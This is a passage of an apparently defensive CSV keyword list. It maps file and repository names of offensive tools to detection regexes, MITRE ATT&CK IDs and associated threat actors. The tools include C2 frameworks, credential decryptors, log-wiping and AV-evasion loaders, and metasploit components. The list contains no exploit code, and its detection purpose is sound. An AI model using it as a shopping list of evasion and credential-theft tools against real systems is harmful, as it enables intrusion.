- T1016 - T1033","TA0006 - TA0011 - TA0040","N/A","Kimsuky","C2","https://github.com/UnkL4b/BabyShark","1","1","N/A","N/A","10","10","189","30","2021-07-03T00:18:18Z","2020-06-02T12:27:20Z","8886" "*/mongodb-brute.nse*",".{0,1000}\/mongodb\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8887" "*/mongodb-databases.nse*",".{0,1000}\/mongodb\-databases\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8888" "*/mongodb-info.nse*",".{0,1000}\/mongodb\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8889" "*/monkey.py",".{0,1000}\/monkey\.py","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1078 - T1135 - T1046 - T1087 - T1105","TA0007 - TA0008 - TA0001 - TA0011","N/A","N/A","Exploitation tool","https://github.com/guardicore/monkey","1","1","N/A","N/A","N/A","10","6779","798","2025-02-28T15:41:56Z","2015-08-30T07:22:51Z","8890" "*/monkey_island.py*",".{0,1000}\/monkey_island\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1078 - T1135 - T1046 - T1087 - T1105","TA0007 - TA0008 - TA0001 - TA0011","N/A","N/A","Exploitation tool","https://github.com/guardicore/monkey","1","1","N/A","N/A","N/A","10","6779","798","2025-02-28T15:41:56Z","2015-08-30T07:22:51Z","8891" "*/MonkeyWorks.git*",".{0,1000}\/MonkeyWorks\.git.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege 
Escalation","https://github.com/0xbadjuju/Tokenvator","1","1","N/A","N/A","N/A","10","1038","201","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z","8892" "*/moonwalk.git*",".{0,1000}\/moonwalk\.git.{0,1000}","offensive_tool_keyword","moonwalk","Cover your tracks during Linux Exploitation by leaving zero traces on system logs and filesystem timestamps.","T1070 - T1036.005 - T1070.004","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/mufeedvh/moonwalk","1","1","#linux","N/A","10","10","1440","129","2022-10-08T05:05:36Z","2021-12-19T11:24:00Z","8893" "*/moonwalk_darwin*",".{0,1000}\/moonwalk_darwin.{0,1000}","offensive_tool_keyword","moonwalk","Cover your tracks during Linux Exploitation by leaving zero traces on system logs and filesystem timestamps.","T1070 - T1036.005 - T1070.004","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/mufeedvh/moonwalk","1","1","#linux","N/A","10","10","1440","129","2022-10-08T05:05:36Z","2021-12-19T11:24:00Z","8894" "*/Moriarty.exe*",".{0,1000}\/Moriarty\.exe.{0,1000}","offensive_tool_keyword","Moriarty","Moriarty is designed to enumerate missing KBs - detect various vulnerabilities and suggest potential exploits for Privilege Escalation in Windows environments.","T1068 - T1083","TA0004 - TA0007","N/A","N/A","Discovery","https://github.com/BC-SECURITY/Moriarty","1","1","N/A","N/A","7","6","510","67","2024-08-07T15:06:31Z","2023-12-11T14:15:33Z","8895" "*/Moriarty.exe*",".{0,1000}\/Moriarty\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","8896" "*/Moriarty.git*",".{0,1000}\/Moriarty\.git.{0,1000}","offensive_tool_keyword","Moriarty","Moriarty is designed to enumerate missing KBs - detect various vulnerabilities and suggest potential exploits for Privilege Escalation in Windows environments.","T1068 - T1083","TA0004 - TA0007","N/A","N/A","Discovery","https://github.com/BC-SECURITY/Moriarty","1","1","N/A","N/A","7","6","510","67","2024-08-07T15:06:31Z","2023-12-11T14:15:33Z","8897" "*/mortar.git*",".{0,1000}\/mortar\.git.{0,1000}","offensive_tool_keyword","mortar","red teaming evasion technique to defeat and divert detection and prevention of security products. Mortar Loader performs encryption and decryption of selected binary inside the memory streams and executes it directly without writing any malicious indicator into the hard-drive. 
Mortar is able to bypass modern anti-virus products and advanced XDR solutions","T1055 - T1027 - T1036 - T1112 - T1037 - T1105 - T1059 - T1562","TA0002 - TA0003 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/0xsp-SRD/mortar","1","1","N/A","N/A","10","10","1451","235","2023-12-21T22:00:38Z","2021-11-25T16:49:47Z","8898" "*/mortar/releases/download/v2/encryptor*",".{0,1000}\/mortar\/releases\/download\/v2\/encryptor.{0,1000}","offensive_tool_keyword","mortar","evasion technique to defeat and divert detection and prevention of security products (AV/EDR/XDR)","T1027 - T1562","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xsp-SRD/mortar","1","1","N/A","N/A","8","10","1451","235","2023-12-21T22:00:38Z","2021-11-25T16:49:47Z","8899" "*/mortar/releases/download/v2/encryptor*",".{0,1000}\/mortar\/releases\/download\/v2\/encryptor.{0,1000}","offensive_tool_keyword","mortar","red teaming evasion technique to defeat and divert detection and prevention of security products. Mortar Loader performs encryption and decryption of selected binary inside the memory streams and executes it directly without writing any malicious indicator into the hard-drive. 
Mortar is able to bypass modern anti-virus products and advanced XDR solutions","T1055 - T1027 - T1036 - T1112 - T1037 - T1105 - T1059 - T1562","TA0002 - TA0003 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/0xsp-SRD/mortar","1","1","N/A","N/A","10","10","1451","235","2023-12-21T22:00:38Z","2021-11-25T16:49:47Z","8900" "*/mortar-loader.html*",".{0,1000}\/mortar\-loader\.html.{0,1000}","offensive_tool_keyword","mortar","evasion technique to defeat and divert detection and prevention of security products (AV/EDR/XDR)","T1027 - T1562","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xsp-SRD/mortar","1","1","N/A","N/A","8","10","1451","235","2023-12-21T22:00:38Z","2021-11-25T16:49:47Z","8901" "*/mount/dropbox/Dropbox/pac2*",".{0,1000}\/mount\/dropbox\/Dropbox\/pac2.{0,1000}","offensive_tool_keyword","pac2","PAC2 is a framework that generates arbitrary flows and sends and executes them on the Power Automate Platform - using Power automate as a C2","T1550.001 - T1204.002 - T1102 - T1071.001","TA0005 - TA0008 - TA0010- TA0011","N/A","N/A","C2","https://github.com/NTT-Security-Japan/pac2","1","0","N/A","N/A","6","10","6","1","2024-04-16T11:58:54Z","2024-03-01T08:06:32Z","8902" "*/Mouse Overheat.exe*",".{0,1000}\/Mouse\sOverheat\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","8903" "*/mouselogger.py*",".{0,1000}\/mouselogger\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - 
T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","8904" "*/mqtt_check.py*",".{0,1000}\/mqtt_check\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","8905" "*/mqtt-subscribe.nse*",".{0,1000}\/mqtt\-subscribe\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8906" "*/mrd0x.html*",".{0,1000}\/mrd0x\.html.{0,1000}","offensive_tool_keyword","PWA-Phishing","Phishing with Progressive Web Apps and UI manipulation","T1071.003 - T1204.002 - T1608.003 - T1071.004","TA0006","N/A","N/A","Phishing","https://github.com/mrd0x/PWA-Phishing","1","1","N/A","N/A","10","3","288","52","2024-06-16T17:47:15Z","2024-06-09T19:47:52Z","8907" "*/mremoteng.py*",".{0,1000}\/mremoteng\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","8908" "*/mRemoteNG-Decrypt*",".{0,1000}\/mRemoteNG\-Decrypt.{0,1000}","offensive_tool_keyword","mRemoteNG-Decrypt","Python script to decrypt passwords stored by mRemoteNG","T1555.003 - T1110.003 - T1003 - T1081","TA0006 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/haseebT/mRemoteNG-Decrypt","1","1","N/A","N/A","8","2","146","42","2023-07-06T16:15:20Z","2019-05-27T05:25:57Z","8909" "*/mremoteng-decrypt.git*",".{0,1000}\/mremoteng\-decrypt\.git.{0,1000}","offensive_tool_keyword","mRemoteNG-Decrypt","Python script to decrypt passwords stored by mRemoteNG","T1555.003 - T1110.003 - T1003 - T1081","TA0006 - TA0009 - TA0011","N/A","N/A","Credential 
Access","https://github.com/kmahyyg/mremoteng-decrypt","1","1","N/A","N/A","8","1","83","21","2022-10-29T16:02:26Z","2019-05-11T09:09:49Z","8910" "*/mremoteng-decrypt/releases/download/*",".{0,1000}\/mremoteng\-decrypt\/releases\/download\/.{0,1000}","offensive_tool_keyword","mRemoteNG-Decrypt","Python script to decrypt passwords stored by mRemoteNG","T1555.003 - T1110.003 - T1003 - T1081","TA0006 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/kmahyyg/mremoteng-decrypt","1","1","N/A","N/A","8","1","83","21","2022-10-29T16:02:26Z","2019-05-11T09:09:49Z","8911" "*/mremoteng-decrypt/tarball/*",".{0,1000}\/mremoteng\-decrypt\/tarball\/.{0,1000}","offensive_tool_keyword","mRemoteNG-Decrypt","Python script to decrypt passwords stored by mRemoteNG","T1555.003 - T1110.003 - T1003 - T1081","TA0006 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/kmahyyg/mremoteng-decrypt","1","1","N/A","N/A","8","1","83","21","2022-10-29T16:02:26Z","2019-05-11T09:09:49Z","8912" "*/mremoteng-decrypt/zipball/*",".{0,1000}\/mremoteng\-decrypt\/zipball\/.{0,1000}","offensive_tool_keyword","mRemoteNG-Decrypt","Python script to decrypt passwords stored by mRemoteNG","T1555.003 - T1110.003 - T1003 - T1081","TA0006 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/kmahyyg/mremoteng-decrypt","1","1","N/A","N/A","8","1","83","21","2022-10-29T16:02:26Z","2019-05-11T09:09:49Z","8913" "*/mrinfo.nse*",".{0,1000}\/mrinfo\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8914" "*/Mr-Un1k0d3r/*",".{0,1000}\/Mr\-Un1k0d3r\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Fileless Lateral Movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY 
BEAR - Sandworm","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","1","N/A","N/A","10","10","1484","248","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z","8915" "*/Mr-xn/cve-2022-23131*",".{0,1000}\/Mr\-xn\/cve\-2022\-23131.{0,1000}","offensive_tool_keyword","POC","POC exploitation of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0001 - TA0002","N/A","N/A","Exploitation tool","https://github.com/Mr-xn/cve-2022-23131","1","1","N/A","N/A","N/A","2","151","47","2024-08-11T18:14:56Z","2022-02-18T11:51:47Z","8916" "*/MS15-034.nse*",".{0,1000}\/MS15\-034\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts","1","1","N/A","N/A","N/A","10","968","369","2022-01-22T18:40:30Z","2011-05-31T05:41:49Z","8917" "*/ms17-010.py*",".{0,1000}\/ms17\-010\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","8918" "*/msf.go",".{0,1000}\/msf\.go","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - 
T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","8919" "*/msf.swf*",".{0,1000}\/msf\.swf.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","8920" "*/msfcrawler*",".{0,1000}\/msfcrawler.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","8921" "*/msfnonstaged.exe*",".{0,1000}\/msfnonstaged\.exe.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","1","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","8922" "*/msfpc.sh*",".{0,1000}\/msfpc\.sh.{0,1000}","offensive_tool_keyword","msfpc","Msfvenom is the combination of payload generation and encoding. It replaced msfpayload and msfencode on June 8th 2015.","T1027 - T1036 - T1564 - T1071 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","Resource Development","https://github.com/g0tmi1k/msfpc","1","1","N/A","N/A","N/A","10","1261","274","2021-05-09T13:16:07Z","2015-06-22T12:58:04Z","8923" "*/msfremove.ps1*",".{0,1000}\/msfremove\.ps1.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. 
and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-omnibus","1","1","N/A","N/A","10","3","268","213","2025-04-18T13:17:56Z","2015-02-26T18:42:09Z","8924" "*/msfstaged.exe*",".{0,1000}\/msfstaged\.exe.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","1","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","8925" "*/msftest/*",".{0,1000}\/msftest\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. 
identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","8926" "*/msfupdate.bat*",".{0,1000}\/msfupdate\.bat.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-omnibus","1","1","N/A","N/A","10","3","268","213","2025-04-18T13:17:56Z","2015-02-26T18:42:09Z","8927" "*/msfupdate.ps1*",".{0,1000}\/msfupdate\.ps1.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-omnibus","1","1","N/A","N/A","10","3","268","213","2025-04-18T13:17:56Z","2015-02-26T18:42:09Z","8928" "*/msfvenom.bat*",".{0,1000}\/msfvenom\.bat.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","1","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","8929" "*/msfvenom/*",".{0,1000}\/msfvenom\/.{0,1000}","offensive_tool_keyword","msfvenom","Msfvenom is the combination of payload generation and encoding. It replaced msfpayload and msfencode on June 8th 2015.","T1059.001 - T1027 - T1210.001 - T1204.002","TA0002 - TA0003 - TA0004","N/A","APT32 - Black Basta","Resource Development","https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","8930" "*/msf-ws.log*",".{0,1000}\/msf\-ws\.log.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. 
exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","#logfile #linux","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","8931" "*/msfws.py*",".{0,1000}\/msfws\.py.{0,1000}","offensive_tool_keyword","MetasploitCoop","Post-exploitation collaboration platform based on MSF","T1105 - T1098 - T1104 - T1136","TA0010 - TA0011 - 